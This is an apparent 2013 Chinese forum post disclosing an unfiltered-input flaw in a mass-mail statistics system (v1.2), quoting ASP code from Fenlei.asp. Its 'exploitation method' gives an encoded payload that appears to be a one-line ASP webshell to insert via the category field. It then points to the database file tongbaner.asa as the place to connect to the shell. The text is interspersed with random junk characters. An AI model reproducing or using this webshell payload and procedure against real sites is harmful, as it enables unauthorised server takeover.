找回密码
 立即注册
查看: 2836|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
, ]& c( Y* n& A$ b# \# g
9 S, J, l) B& l# ^IF Request.QueryString("Action")="del" Then
9 X: E- C5 H: ^5 l* OID=Request.QueryString("ID")
- @# ~, ?7 f: e8 }IF Countss ("tui","Fenlei",ID )<>0 then
* A* D- o5 T* g'略 6 A* G& T" G' A) q$ ~: c4 a
IF Request.QueryString("Action")="Add" Then $ J) ~& A5 Z9 J
Tname=Request.Form("Typename") + P. A7 v( X2 C; v+ a6 F& {7 b
Set Rs=Server.CreateObject("adodb.Recordset")
* `! e( [" L* e0 f$ r6 A9 h- SSql="Select * From Fenlei Order by id Desc "
6 a9 M) r" }7 @- I, ERs.Open Sql,Conn,1,3 " b5 H; D+ n: N5 q1 g. A
Rs.Addnew 7 G/ R: _* S- H- q
Rs("Typename")=Tname 9 k/ m" {" Z9 q0 v. {# k
'略
9 i$ c% G% }) _0 z$ g, M1 TSet Rs=Server.CreateObject("adodb.Recordset")
, X/ w/ \! w+ [; ?8 M; j* jSql="Select * From Fenlei Order by id Desc " % L8 X; v% `! a& p
Rs.Open Sql,Conn,1,1 # B3 r6 c  B1 m! w3 ^# w
'略
) p3 ]' \9 f; n%>
1 Y0 [0 [; c  [9 m0 ?- f$ a( K( h) R" _1 {
  O# `7 ?, e' O% d' U ) T0 P+ l* B5 l' p- W

) z* t. c* Z5 y1 ~, I没有过滤,直接写入数据库。. D8 |" l9 x8 I  v
+ k. ^$ g" X3 ^* ?( W% g4 ^& H6 C
利用方法:
8 k# ]( w! K& h ; o" T+ f; R5 `( \
插入:┼攠數畣整爠煥敵瑳∨≡┩>% b# e8 R  |+ j) o8 B* J! I7 A

& K- u0 |, p7 c0 @% f 9 \. X" Z3 o% H+ K
连接: http://www.xxx.com/###tongbaner.asa
% Z5 F9 _5 {" T8 h'默认安装文件:
0 w6 c/ h& u) _+ T0 m'install.asp
, V& _- H8 T0 g. u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表